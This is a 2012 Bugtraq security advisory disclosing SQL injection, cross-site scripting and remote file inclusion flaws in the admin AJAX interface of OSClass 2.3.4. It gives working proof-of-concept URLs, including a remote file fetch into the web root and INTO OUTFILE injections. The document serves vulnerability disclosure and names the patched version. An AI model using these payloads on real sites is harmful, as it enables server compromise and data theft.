[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple vulnerabilities in OSClass
From:       Filippo Cavallarin <filippo.cavallarin () codseq ! it>
Date:       2012-01-30 12:31:58
Message-ID: 9FD841D6-CBAF-4238-9030-603BBF29384F () codseq ! it
[Download RAW message or body]

Advisory ID:	CSA-12003
Title:	Multiple vulnerabilities in OSClass
Product:	OSClass
Version:	2.3.4 and probably prior
Vendor:	osclass.org
Vulnerability type:	SQL injection, XSS, Remote file inclusion
Vendor notification:	2012-01-12
Public disclosure:	2012-01-27


OSClass version 2.3.4 and probably below suffers from multiple vulnerabilities:


1) Remote file inclusion in osc_downloadFile(). This vuln allows an attacker to put \
an arbitrary file (ie a melicious php script) on the server under the www root so \
it's possible to execute shell commands with the previleges of the webserver  An \
attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=upgrade&file=http://127.0.0.1/tmp.php


http://127.0.0.1/osclass/oc-content/downloads/tmp.php



2) SQL injection in admin's ajax interface when performing the "edit_category_post" \
action. The GET parameted id is not sanitized. An attacker must be logged as admin to \
exploit this vulnerability; gpc_magic_quotes must be off

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=edit_category_post&en_US% \
23s_name=pi&en_US%23s_description=p&id=2122992'%20into%20outfile%20'/tmp/poc'%20--%201




3) SQL injection in admin's ajax interface when performing the "enable_category" \
action. The GET parameted id is not sanitized. An attacker must be logged as admin to \
exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2)%20poc%20into%20outfile%20'/tmp/poc'%20--%201


(id must be a valid subcategory id - in this case gpc_magic_quotes can be on)



4) XSS in admin's' ajax interface. The GET parameted id is not sanitized.
An attacker must be logged as admin to exploit this vulnerability.

http://127.0.0.1/osclass/oc-admin/index.php?page=ajax&action=enable_category&id=2%3Ca%20onmouseover='alert(1)'%3E


(id must be a valid category id)


Solution

upgrade to OSClass 2.3.5

http://osclass.org/2012/01/16/osclass-2-3-5/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it


[prev in list] [next in list] [prev in thread] [next in thread]